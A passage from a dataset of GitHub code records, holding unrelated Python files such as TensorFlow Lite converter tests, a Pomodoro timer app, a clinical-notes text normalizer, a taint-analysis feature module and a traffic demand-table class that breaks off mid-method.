test_create_post_no_data(self):\n form = CreatePostForm(data={})\n\n self.assertFalse(form.is_valid())\n self.assertEqual(len(form.errors), 2)\n","repo_name":"KulykDima/Django_blog","sub_path":"src/post/test/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"74517380534","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\n\nfrom tensorflow.python import keras\nfrom tensorflow.python import tf2\nfrom tensorflow.python.client import session\nfrom tensorflow.python.eager import def_function\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.platform import resource_loader\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.saved_model import saved_model\nfrom tensorflow.python.saved_model.save import save\nfrom tensorflow.python.training.tracking import tracking\nfrom tensorflow.python.training.training_util import write_graph\n\n\nclass TestModels(test_util.TensorFlowTestCase):\n\n def _getFilepath(self, filename):\n return os.path.join(self.get_temp_dir(), filename)\n\n def _run(self, flags_str, should_succeed):\n output_file = os.path.join(self.get_temp_dir(), 'model.tflite')\n tflite_bin = resource_loader.get_path_to_datafile('tflite_convert')\n cmdline = '{0} --output_file={1} {2}'.format(tflite_bin, output_file,\n flags_str)\n\n exitcode = os.system(cmdline)\n if exitcode == 0:\n with gfile.Open(output_file, 'rb') as model_file:\n content = model_file.read()\n self.assertEqual(content is not None, should_succeed)\n os.remove(output_file)\n else:\n self.assertFalse(should_succeed)\n\n def _getKerasModelFile(self):\n x = np.array([[1.], [2.]])\n y = np.array([[2.], [4.]])\n\n model = keras.models.Sequential([\n keras.layers.Dropout(0.2, input_shape=(1,)),\n keras.layers.Dense(1),\n ])\n model.compile(optimizer='sgd', loss='mean_squared_error')\n model.fit(x, y, epochs=1)\n\n keras_file = self._getFilepath('model.h5')\n keras.models.save_model(model, keras_file)\n return keras_file\n\n\nclass TfLiteConvertV1Test(TestModels):\n\n def _run(self, flags_str, should_succeed):\n if tf2.enabled():\n flags_str += ' --enable_v1_converter'\n super(TfLiteConvertV1Test, self)._run(flags_str, should_succeed)\n\n def testFrozenGraphDef(self):\n with ops.Graph().as_default():\n in_tensor = array_ops.placeholder(\n shape=[1, 16, 16, 3], dtype=dtypes.float32)\n _ = in_tensor + in_tensor\n sess = session.Session()\n\n # Write graph to file.\n graph_def_file = self._getFilepath('model.pb')\n write_graph(sess.graph_def, '', graph_def_file, False)\n sess.close()\n\n flags_str = ('--graph_def_file={0} --input_arrays={1} '\n '--output_arrays={2}'.format(graph_def_file,\n 'Placeholder', 'add'))\n self._run(flags_str, should_succeed=True)\n os.remove(graph_def_file)\n\n def testSavedModel(self):\n saved_model_dir = self._getFilepath('model')\n with ops.Graph().as_default():\n with session.Session() as sess:\n in_tensor = array_ops.placeholder(\n shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')\n out_tensor = in_tensor + in_tensor\n inputs = {'x': in_tensor}\n outputs = {'z': out_tensor}\n 
saved_model.simple_save(sess, saved_model_dir, inputs, outputs)\n\n flags_str = '--saved_model_dir={}'.format(saved_model_dir)\n self._run(flags_str, should_succeed=True)\n\n def testKerasFile(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = '--keras_model_file={}'.format(keras_file)\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n def testKerasFileMLIR(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = ('--keras_model_file={} --experimental_new_converter'\n .format(keras_file))\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n\nclass TfLiteConvertV2Test(TestModels):\n\n @test_util.run_v2_only\n def testSavedModel(self):\n input_data = constant_op.constant(1., shape=[1])\n root = tracking.AutoTrackable()\n root.f = def_function.function(lambda x: 2. * x)\n to_save = root.f.get_concrete_function(input_data)\n\n saved_model_dir = self._getFilepath('model')\n save(root, saved_model_dir, to_save)\n\n flags_str = '--saved_model_dir={}'.format(saved_model_dir)\n self._run(flags_str, should_succeed=True)\n\n @test_util.run_v2_only\n def testKerasFile(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = '--keras_model_file={}'.format(keras_file)\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n @test_util.run_v2_only\n def testKerasFileMLIR(self):\n keras_file = self._getKerasModelFile()\n\n flags_str = ('--keras_model_file={} --experimental_new_converter'\n .format(keras_file))\n self._run(flags_str, should_succeed=True)\n os.remove(keras_file)\n\n def testMissingRequired(self):\n self._run('--invalid_args', should_succeed=False)\n\n def testMutuallyExclusive(self):\n self._run(\n '--keras_model_file=model.h5 --saved_model_dir=/tmp/',\n should_succeed=False)\n\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"algorithmdog/tensorflow-cplusplus-learn","sub_path":"tensorflow/lite/python/tflite_convert_test.py","file_name":"tflite_convert_test.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"26807929682","text":"list1 = \"my name is saurabh and i am still a noodler in programming\"\n\nlist1 = list1.split(\" \")\n#print(list1)\n\n\nprint(\"wait there are few more stuffs\")\nlist2 = \"saurabh has high temper problem as well\"\nlist2 =list2.split(\" \")\n\nlist4 =[]\n\n#print (list2)\n\n\n#def contatination():\n#\tlist3 = list1 + list2\n#\tprint(list3)\n\n\ndef func(num):\n\n\tfor i in range(0,num):\n\t\tack = list2.pop()\n\t\tlist4.append(ack)\n\n\tprint(list4)\n\n\n# contatination()\nnum = int(input(\"enter how many number your would like to add to the list\"))\nfunc(num)\n\n\n\n","repo_name":"saurabhban/beginner","sub_path":"codes/ex38.py","file_name":"ex38.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5741732769","text":"import http.client\nimport os\nimport json\nimport re\nimport sys\n\n\ndef clean_from_comments(content):\n return re.sub(\"(\\/\\*{1,}[^\\/]{0,}\\*{1,}\\/)\", \"\", content)\n\n\ndef main():\n EXTERNALS_PATH = \"./externals.jsonc\"\n\n if os.path.isfile(EXTERNALS_PATH):\n with open(EXTERNALS_PATH, \"r\") as file:\n content = clean_from_comments(file.read())\n externals = json.loads(content)\n\n name = sys.argv[1]\n\n connection = http.client.HTTPConnection(\"94.250.250.29\", 5050)\n\n headers = {\n \"Content-Type\": \"application/json\",\n }\n payload = 
{\"name\": name, \"externals\": externals, \"env\": \"prod\"}\n payload_json = json.dumps(payload)\n\n print(f\"payload_json {payload_json}\")\n\n connection.request(\n \"POST\", \"/update-externals\", body=payload_json, headers=headers\n )\n res = connection.getresponse()\n\n if res.status == 200:\n print(\n f\"External dependencies of microfrontend {name} were successfully updated\"\n )\n exit(0)\n else:\n print(f\"Error occurred! {res.read().decode('utf-8')}\")\n exit(1)\n else:\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"microfrontends-diploma/navigation-mf","sub_path":".github/scripts/ext-libraries.py","file_name":"ext-libraries.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9752111281","text":"\"\"\" 解析前に持っていたデータを作業前クレンジングするための処理ファイル\n[前提]\n- カルテデータはexcelで送付されました(=SJIS)\n[ゴール]\n- UT8\n- TSV\n- 改行コード LF\n- ヘッダーなし\n- インデックスなし\n\"\"\"\nfrom __future__ import unicode_literals\nimport re\nimport unicodedata\nfrom pathlib import Path\nimport pandas as pd\n\n\ndef unicode_normalize(cls, s):\n \"\"\"Neologd プレ処理\"\"\"\n pt = re.compile('([{}]+)'.format(cls))\n\n def norm(c):\n return unicodedata.normalize('NFKC', c) if pt.match(c) else c\n\n s = ''.join(norm(x) for x in re.split(pt, s))\n s = re.sub('-', '-', s)\n return s\n\n\ndef remove_extra_spaces(s):\n \"\"\"Neologd プレ処理\"\"\"\n s = re.sub('[  ]+', ' ', s)\n blocks = ''.join(('\\u4E00-\\u9FFF', # CJK UNIFIED IDEOGRAPHS\n '\\u3040-\\u309F', # HIRAGANA\n '\\u30A0-\\u30FF', # KATAKANA\n '\\u3000-\\u303F', # CJK SYMBOLS AND PUNCTUATION\n '\\uFF00-\\uFFEF' # HALFWIDTH AND FULLWIDTH FORMS\n ))\n basic_latin = '\\u0000-\\u007F'\n\n def remove_space_between(cls1, cls2, s):\n \"\"\"Neologd プレ処理\"\"\"\n p = re.compile('([{}]) ([{}])'.format(cls1, cls2))\n while p.search(s):\n s = p.sub(r'\\1\\2', s)\n return s\n\n s = remove_space_between(blocks, blocks, s)\n s = remove_space_between(blocks, basic_latin, s)\n s = remove_space_between(basic_latin, blocks, s)\n return s\n\n\ndef normalize_neologd(s):\n \"\"\"Neologd プレ処理\"\"\"\n s = s.strip()\n s = unicode_normalize('0-9A-Za-z。-゚', s)\n\n def maketrans(f, t):\n return {ord(x): ord(y) for x, y in zip(f, t)}\n\n s = re.sub('[˗֊‐‑‒–⁃⁻₋−]+', '-', s) # normalize hyphens\n s = re.sub('[﹣-ー—―─━ー]+', 'ー', s) # normalize choonpus\n s = re.sub('[~∼∾〜〰~]', '', s) # remove tildes\n s = s.translate(\n maketrans('!\"#$%&\\'()*+,-./:;<=>?@[¥]^_`{|}~。、・「」',\n '!”#$%&’()*+,-./:;<=>?@[¥]^_`{|}〜。、・「」'))\n\n s = remove_extra_spaces(s)\n s = unicode_normalize('!”#$%&’()*+,-./:;<>?@[¥]^_`{|}〜', s) # keep =,・,「,」\n s = re.sub('[’]', '\\'', s)\n s = re.sub('[”]', '\"', s)\n return s\n\n\n# 作業前ファイル\nsource_file = Path.cwd().joinpath('202001.xlsx')\n# 吐き出しファイル\nresult_file = Path.cwd().joinpath('cleansing-completed.tsv')\n\n# Excelファイルの読み込み\ndf = pd.read_excel(source_file, engine='openpyxl')\n# 改行コードの修正\nchange_indention = df.replace('_x000D_', '', regex=True)\n\n# neologd 前処理\nwith open(result_file, mode='w', encoding='utf8') as f:\n for column_name, row in change_indention.iterrows():\n if row['タイトル'] == '診療録':\n # 診療録のみを抽出し、内容カラムにneologd前処理をかける\n exclude_space = remove_extra_spaces(row['内容'])\n normalize_detail = normalize_neologd(exclude_space)\n\n # TSV書き込み\n write_data = [row['患者番号'], str(row['登録日時']), row['タイトル'], '\"' + normalize_detail + '\"']\n f.writelines('\\t'.join(write_data) + '\\n')\n\n else:\n print(row['タイトル'] + ' 
skip')\n","repo_name":"mahya8585/Karte-Analisys","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34808149058","text":"from tkinter import *\nimport math\n\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nreps = 0\ntimer = None\nis_timer_running = False\n#RESETTING TIMER MECHANISM\n\ndef reset_timer():\n global reps\n global is_timer_running\n if is_timer_running:\n window.after_cancel(timer)\n canvas.itemconfig(timer_text, text= \"00:00\")\n title_label.config(text = \"IDLE TIMER\")\n check_marks.config(text = \"\")\n reps = 0\n is_timer_running = False\n start_button.config(state=NORMAL)\n reset_button.config(state=DISABLED)\n\n#STARTING TIMER MECHANIZM\n\ndef start_timer():\n global reps\n global is_timer_running\n is_timer_running = False\n if not is_timer_running:\n reps+=1\n work_sec = WORK_MIN * 60\n short_break_sec = SHORT_BREAK_MIN * 60\n long_break_sec = LONG_BREAK_MIN * 60\n\n if reps % 8 == 0:\n count_down(long_break_sec)\n title_label.config(text=\"LONG-BREAK\")\n elif reps % 2 == 0:\n count_down(short_break_sec)\n title_label.config(text=\"SHORT-BREAK\")\n else:\n count_down(work_sec)\n title_label.config(text=\"WORK-SESSION\")\n is_timer_running = True\n start_button.config(state=DISABLED)\n reset_button.config(state=NORMAL)\n\n#COUNT DOWN MECHANISM\ndef count_down(count):\n\n count_min = math.floor(count/60)\n count_sec = count%60\n if count_sec<10:\n count_sec =f\"0{count_sec}\"\n if count>=0:\n global timer\n canvas.itemconfig(timer_text, text=f\"{count_min}:{count_sec}\")\n timer = window.after(1000, count_down, count - 1)\n else:\n start_timer()\n mark =\"\"\n for _ in range(math.floor(reps/2)):\n mark+=\"✔️\"\n check_marks.config(text = mark)\n\n#UI SETUP\nwindow = Tk()\nwindow.title(\"Pomodoro\")\nwindow.config(padx = 100, pady=50, bg=YELLOW)\ncanvas = Canvas(width=200, height=224, background=YELLOW, highlightthickness=0)\n\n\ntitle_label = Label(text=\"IDLE TIMER\",font=(FONT_NAME, 40, \"bold\"), fg=GREEN, bg=YELLOW)\ntitle_label.grid(column=1, row=0)\n\n\nstart_button = Button(text= \"Start\", command =start_timer)\nstart_button.grid(column=0, row=2)\n\nreset_button = Button(text=\"Reset\",command=reset_timer, state=DISABLED)\nreset_button.grid(column=2, row=2)\n\ntomato_img = PhotoImage(file = \"tomato.png\")\ncanvas.create_image(100, 112, image=tomato_img)\ntimer_text = canvas.create_text(103,130, text=\"00:00\", fill=\"white\", font=(FONT_NAME,35, \"bold\"))\ncanvas.grid(column=1, row=1)\n\ncheck_marks = Label(fg = GREEN, bg = YELLOW, font=(FONT_NAME, 18, \"bold\"))\ncheck_marks.grid(column=1, row=2)\n\nwindow.mainloop()\n","repo_name":"Aizad-eng/pomodoro-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74798456428","text":"# BN edge formation을 위해 Pairwise Similarity를 결정하기 위한 feature 값을 정해 주는 모듈이 아닌,\n# tabula_non_rasa에서 tentative rule을 적용하기 위한 feature 값을 정해 주는 모듈.\n# 하나의 그래프에 대해서만 dataframe을 그린다.\n\nimport json\nimport pandas as pd\nimport networkx as nx\nimport re\nimport os\n\nfrom create_node import process\nfrom java_builtins import builtin_collections, builtin_types\n\ndef 
retrieve_path():\n \"\"\"paths.json을 읽고 path를 가져온다.\"\"\"\n with open(\"paths.json\", \"r+\") as pathjson:\n pathdict = json.load(pathjson)\n return pathdict[\"project_root_directory\"]\n\n\n# Constants ================================\n# ==========================================\n\nPROJECT_ROOT_DIR = retrieve_path()\n\nwith open(os.path.join(PROJECT_ROOT_DIR, \"GetterSetter.json\"), \"r+\") as f:\n GETTER_SETTER = json.load(f)\n\n\nwith open(os.path.join(PROJECT_ROOT_DIR, \"Annotations.json\"), \"r+\") as f:\n ANNOTATIONS = json.load(f)\n\n\nbuiltin_type_classes = list(filter(lambda x:\\\n '[' not in x and\n ']' not in x, builtin_types))\nwrapped_primitives = list(map(lambda string: string[0].upper() + string[1:], builtin_type_classes))\n\n\n# feature value setters ========================\n# ==============================================\n\n\ndef getter_setter_mapfunc(row):\n try:\n return GETTER_SETTER[row[\"name\"]]\n except:\n return \"nothing\"\n\n\ndef set_getter_setter(df):\n \"\"\"getter_setter 칼럼의 값을 ['getter'|'setter'|'nothing']으로 초기화\"\"\"\n getter_setter_val_df = df.apply(getter_setter_mapfunc, axis=1)\n df[\"getter_setter\"] = getter_setter_val_df\n return df\n\n\n# https://stackoverflow.com/questions/29916065/how-to-do-camelcase-split-in-python\ndef camel_case_split(identifier):\n matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', identifier)\n return [m.group(0) for m in matches]\n\n\ndef is_hashCode_mapfunc(row):\n if \"hashCode\" == process(row['name'])[2]:\n return True\n else:\n return False\n\n\ndef is_assert_mapfunc(row):\n if \"assert\" in camel_case_split(row[\"name\"]): \n return True\n else:\n return False\n\n\ndef set_is_hashCode(df):\n \"\"\"is_hashCode 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_hashCode_val_df = df.apply(is_hashCode_mapfunc, axis=1)\n df[\"is_hashCode\"] = is_hashCode_val_df\n return df\n\n\ndef set_is_assert(df):\n \"\"\"is_assert 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_assert_val_df = df.apply(is_assert_mapfunc, axis=1)\n df[\"is_assert\"] = is_assert_val_df\n return df\n\n\ndef is_to_mapfunc(row):\n if camel_case_split(row[\"name\"])[0] == \"to\": \n return True\n else:\n return False\n\n\ndef set_is_to(df):\n \"\"\"is_to 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_to_val_df = df.apply(is_assert_mapfunc, axis=1)\n df[\"is_to\"] = is_to_val_df\n return df\n\n\ndef is_wrapping_primitive_mapfunc(row):\n classname = process(row['name'])[0]\n if classname in wrapped_primitives:\n return True\n else:\n return False\n\n\ndef set_is_wrapping_primitive(df):\n \"\"\"is_wrapping_primitive 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_wrapping_primitive_val_df = df.apply(is_wrapping_primitive_mapfunc, axis=1)\n df[\"is_wrapping_primitive\"] = is_wrapping_primitive_val_df\n return df\n\n\ndef is_builtin_coll_mapfunc(row):\n classname = process(row['name'])[0]\n if classname in builtin_collections:\n return True\n else:\n return False\n\n\ndef set_is_builtin_coll(df):\n \"\"\"is_builtin_coll 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_builtin_coll_df = df.apply(is_builtin_coll_mapfunc, axis=1)\n df[\"is_builtin_coll\"] = is_builtin_coll_df\n return df\n\n\ndef is_GET_POST_SELECT_mapfunc(row):\n annot = ANNOTATIONS[row[\"name\"]]\n if \"GET\" in annot:\n return \"GET\"\n elif \"POST\" in annot:\n return \"POST\"\n elif \"SELECT\" in annot:\n return \"SELECT\"\n else:\n return \"nothing\"\n\n\ndef set_is_GET_POST_SELECT(df):\n \"\"\"is_GET_POST_SELECT 칼럼의 값을 [True|False]로 초기화\"\"\"\n is_GET_POST_SELECT = df.apply(is_builtin_coll_mapfunc, axis=1)\n 
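Every feature column above is built with the same apply-then-assign pattern. Note that, as written, set_is_to and set_is_GET_POST_SELECT apply is_assert_mapfunc and is_builtin_coll_mapfunc rather than their own mapfuncs; the standalone sketch below wires the column to its matching mapfunc, which appears to be the intent. Names and sample data here are illustrative only.

# Minimal sketch of the per-column apply-then-assign feature pattern.
import re
import pandas as pd

def camel_case_split(identifier):
    matches = re.finditer(
        '.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', identifier)
    return [m.group(0) for m in matches]

def is_to_mapfunc(row):
    # True when the first camel-case token of the name is "to", e.g. "toString".
    return camel_case_split(row["name"])[0] == "to"

df = pd.DataFrame({"name": ["toString", "assertEquals", "hashCode"]})
df["is_to"] = df.apply(is_to_mapfunc, axis=1)  # each setter uses its own mapfunc
print(df)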
df[\"is_GET_POST_SELECT\"] = is_GET_POST_SELECT\n return df\n\n\n# main =================================\n# ======================================\n\ndef main(graph_nodes):\n \"\"\"주어진 그래프에 대한 DataFrame을 초기화한다.\"\"\"\n # \"name\" columns부터 만든다.\n df = pd.DataFrame(list(graph_nodes), columns=['name'])\n\n # \"getter_setter\" column을 만든다.\n df = set_getter_setter(df)\n\n # \"is_hashCode\" column을 만든다.\n df = set_is_hashCode(df)\n\n # \"is_assert\" column을 만든다.\n df = set_is_assert(df)\n\n # \"is_to\" column을 만든다.\n df = set_is_to(df)\n\n # \"is_wrapping_primitive\" column을 만든다.\n df = set_is_wrapping_primitive(df)\n\n # \"is_builtin_coll\" column을 만든다.\n df = set_is_builtin_coll(df)\n\n # \"is_GET_POST_SELECT\" column을 만든다.\n df = set_is_GET_POST_SELECT(df)\n\n return df\n","repo_name":"jeongsoolee09/Taint-Analysis","sub_path":"Code/BayesianNetwork/extra_features.py","file_name":"extra_features.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19240965730","text":"from django.core.management import BaseCommand, call_command\nfrom OMDApp.models import Veterinario, Turno\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Permission\nfrom django.db.models import Q\nfrom datetime import date\n# from yourapp.models import User # if you have a custom user\n\n\nclass Command(BaseCommand):\n help = \"DEV COMMAND: Fill databasse with a set of data for testing purposes\"\n\n def handle(self, *args, **options):\n call_command('loaddata', 'vet.json')\n # Set vet permissions\n vet_perm = Permission.objects.get(codename='is_vet')\n for vet in Veterinario.objects.all():\n vet.user.user_permissions.add(vet_perm)\n # Fix the passwords of fixtures and set client permissions\n client_perm = Permission.objects.get(codename='is_client')\n for user in get_user_model().objects.all():\n if user.email.startswith(\"user\"):\n user.user_permissions.add(client_perm)\n user.set_password(user.password)\n user.save()\n \n for turn in Turno.objects.all().exclude(motive=\"Demo\"):\n turn.date = date.today()\n turn.save()\n\n for turn in Turno.objects.filter(state='F'):\n turn.add_to_clinic_history()\n turn.add_to_health_book()","repo_name":"cd-paliv/IS2","sub_path":"src/OMD/OMDApp/management/commands/initdata.py","file_name":"initdata.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1293659544","text":"__copyright__ = \"Copyright 2011-2012 SFCTA\"\n__license__ = \"\"\"\n This file is part of DTA.\n\n DTA is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n DTA is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with DTA. 
If not, see .\n\"\"\"\nimport pdb\nimport copy\nimport csv\nimport datetime\nfrom itertools import izip \n\nimport numpy as np\n\nimport dta\nfrom dta.Algorithms import hasPath, getClosestCentroid \nfrom dta.DtaError import DtaError\nfrom dta.MultiArray import MultiArray\nfrom dta.Utils import Time\n\nclass Demand(object):\n \"\"\"\n Class that represents the demand matrix for a :py:class:`Network`\n \"\"\"\n\n @classmethod\n def readCubeODTable(cls, fileName, net, vehicleClassName, \n startTime, endTime, timeStep, demandPortion):\n \"\"\"\n Reads the demand (linear format) from the input csv file and returns a demand instance.\n \n :param fileName: the file containing the demand; this will be a CSV containing \n ``Origin, Destination, VehicleClassDemand1, VehicleClassDemand2, ...``. The header line will be used\n to determine which column is relevant to which Vehicle Class.\n :param net: the Network for which this demand is relevant, used to get TAZ numbers.\n :type net: a :py:class:`Network` instance\n :param vehClassName: a string that must match the relevant :py:class:`VehicleClass` exactly (it's case-sensitive!)\n :param startTime: the simulation start time for when this demand will get added to the network.\n :type startTime: a :py:class:`dta.Utils.Time` instance\n :param endTime: the simulation end time for this demand will stop being added to the network.\n :type endTime: a :py:class:`dta.Utils.Time` instance\n :param timeStep: the granularity of time steps at which the demand is represented.\n :type timeStep: a :py:class:`dta.Utils.Time` instance\n \n \"\"\"\n timeSpan = endTime - startTime\n demand = Demand(net, vehicleClassName, startTime, endTime, timeStep)\n #demand = Demand(net, vehicleClassName, startTime, endTime, timeSpan)\n totTrips = 0\n numIntrazonalTrips = 0\n inputStream = open(fileName, \"r\")\n checkSum = 0 \n \n for record in csv.DictReader(inputStream):\n \n origin = int(record[\"O\"])\n destination = int(record[\"D\"])\n trips = demandPortion*float(record[vehicleClassName])\n totTrips += trips\n tripsInHourlyFlows = trips * (60.0 / timeSpan.getMinutes())\n \n if tripsInHourlyFlows == 0:\n continue\n if origin == destination:\n origCent = net.getNodeForId(origin)\n destCent, dist = getClosestCentroid(net, origCent)\n tripsIntrazonal = tripsInHourlyFlows/2\n tripsBefore = demand.getTotalNumTrips()\n for i,timeSlice in enumerate(demand._timePeriods):\n tripsOD = demand.getValue(timeSlice, origCent.getId(), destCent.getId())\n tripsDO = demand.getValue(timeSlice, destCent.getId(), origCent.getId())\n tripsOD += tripsIntrazonal\n tripsDO += tripsIntrazonal\n demand.setValue(timeSlice, origCent.getId(), destCent.getId(), tripsOD)\n demand.setValue(timeSlice, destCent.getId(), origCent.getId(), tripsDO)\n #dist = dist/5280\n #dta.DtaLogger.debug(\"Assigning %f intrazonal trips from zone %s to zone %s, %8.4f miles away.\" % (tripsInHourlyFlows,origCent.getId(),destCent.getId(),dist))\n numIntrazonalTrips += trips\n continue\n if not net.hasCentroidForId(origin):\n dta.DtaLogger.error(\"Origin zone %d does not exist\" % origin)\n continue \n if not net.hasCentroidForId(destination):\n dta.DtaLogger.error(\"Destination zone %s does not exist\" % destination)\n continue\n for i,timeSlice in enumerate(demand._timePeriods):\n tripsOD = demand.getValue(timeSlice, origin, destination)\n tripsOD += tripsInHourlyFlows\n demand.setValue(timeSlice, origin, destination, tripsOD)\n #if destination == 7973:\n # checkSum += trips\n\n dta.DtaLogger.info(\"The cube table has the 
following fields: %s\" % \",\".join(record.keys()))\n \n dta.DtaLogger.info(\"Read %10.2f %-16s from %s\" % (totTrips, \"%s TRIPS\" % vehicleClassName, fileName))\n if numIntrazonalTrips > 0:\n dta.DtaLogger.info(\"Reassigned %f intrazonal Trips\" % numIntrazonalTrips)\n if totTrips - demand.getTotalNumTrips() > 1:\n dta.DtaLogger.error(\"The total number of trips in the Cube table = %d not equal to the number of trips transfered to Dynameq = %d.\" % (totTrips,demand.getTotalNumTrips()))\n #dta.DtaLogger.info(\"There are %10.2f trips to zone 7973\" % checkSum)\n \n return demand\n \n @classmethod\n def readDynameqTable(cls, net, fileName):\n \"\"\"\n Read the dynameq demand stored in the *fileName* that pertains to *net*, a :py:class:`Network` instance.\n This method reads only rectangular demand tables. \n \"\"\"\n DYNAMEQ_FORMAT_FULL = \"FORMAT:full\" \n \n input = open(fileName, \"rb\")\n \n input.next() # \n input.next() # \n input.next() # \n input.next() # * comment \n line = input.next().strip() \n if line != DYNAMEQ_FORMAT_FULL:\n raise DtaError(\"I cannot read a demand format other than %s\" % Demand.FORMAT_FULL)\n input.next() # VEH_CLASS \n line = input.next().strip() \n\n vehClassName = line\n input.next() #DATA \n line = input.next().strip() \n\n startTime = Time.readFromString(line)\n line = input.next().strip()\n endTime = Time.readFromString(line) \n \n line = input.next().strip() #SLICE \n assert line == \"SLICE\" \n line = input.next().strip() # first time slice\n \n timeSlice1 = Time.readFromString(line)\n\n timeStep = timeSlice1 - startTime \n if timeStep.getMinutes() == 0:\n raise DtaError(\"The time step defined by the first slice cannot be zero\") \n \n demand = Demand(net, vehClassName, startTime, endTime, timeStep)\n _npyArray = demand._demandTable.getNumpyArray()\n\n timeStepInMin = timeStep.getMinutes()\n\n for i, timePeriod in enumerate(demand.iterTimePeriods()):\n if timePeriod != demand.startTime + demand.timeStep: \n line = input.next().strip()\n assert line == \"SLICE\"\n line = input.next().strip() \n destinations = map(int, input.next().strip().split())\n for j, origin in enumerate(range(net.getNumCentroids())):\n fields = map(float, input.next().strip().split()) \n #_npyArray[i,j,:] = np.array(fields[1:]) / ( 60.0 / timeStepInMin)\n _npyArray[i,j,:] = np.array(fields[1:])\n \n return demand\n\n\n\n def __init__(self, net, vehClassName, startTime, endTime, timeStep):\n \"\"\"\n Constructor that initializes an empty Demand table that has three dimensions:\n time, origin taz, destination taz. 
\n \n :param net: the Network for which this demand is relevant, used to get TAZ numbers.\n :type net: a :py:class:`Network` instance\n :param vehClassName: a string that must match the relevant :py:class:`VehicleClass` exactly (it's case-sensitive!)\n :param startTime: the simulation start time for when this demand will get added to the network.\n :type startTime: a :py:class:`dta.Utils.Time` instance\n :param endTime: the simulation end time for this demand will stop being added to the network.\n :type endTime: a :py:class:`dta.Utils.Time` instance\n :param timeStep: the granularity of time steps at which the demand is represented.\n :type timeStep: a :py:class:`dta.Utils.Time` instance\n \"\"\"\n self._net = net \n\n if startTime >= endTime:\n raise DtaError(\"Start time %s is grater or equal to the end time %s\" %\n startTime, endTime)\n if timeStep.getMinutes() == 0:\n raise DtaError(\"Time step %s cannot be zero\" % timeStep) \n\n if ((endTime - startTime) % timeStep) != 0:\n raise DtaError(\"Demand interval is not divisible by the demand time step\") \n\n self.startTime = startTime\n self.endTime = endTime\n self.timeStep = timeStep\n self.vehClassName = vehClassName\n\n self._timePeriods = self._getTimePeriods(startTime, endTime, timeStep)\n self._timeLabels = self._timePeriods # map(self._datetimeToMilitaryTime, self._getTimePeriods(startTime, endTime, timeStep))\n\n self._centroidIds = sorted([c.getId() for c in net.iterNodes() if c.isCentroid()]) \n\n self._demandTable = MultiArray(\"d\", [self._timeLabels, self._centroidIds, self._centroidIds])\n \n #TODO: what are you going to do with vehicle class names? \n #self._vehicleClassNames = [vehClass.name for vehClass in self._net.getScenario().vehicleClassNames]\n\n def iterTimePeriods(self):\n \"\"\"\n Return an iterator to the time periods associated with the demand time slices\n \"\"\"\n return iter(self._timePeriods)\n\n def getNumSlices(self):\n \"\"\"\n Return the number of time slices the demand has been split\n \"\"\"\n return len(self._timePeriods)\n \n def _getTimePeriods(self, startTime, endTime, timeStep):\n \"\"\"\n Return the time labels of the different time slices as a list of :py:class:`dta.Utils.Time` instances.\n Each time in the list is the *end* of the time slice.\n \"\"\" \n if ((endTime - startTime) % timeStep) != 0:\n raise DtaError(\"Demand interval is not divisible by the demand time step\") \n \n result = []\n #TODO: this is interesting. The following line fails\n #time = copy.deepcopy(startTime)\n time = Time(startTime.hour, startTime.minute)\n while time != endTime:\n time += timeStep\n result.append(time)\n\n return result \n\n def _timeInMin(self, time):\n 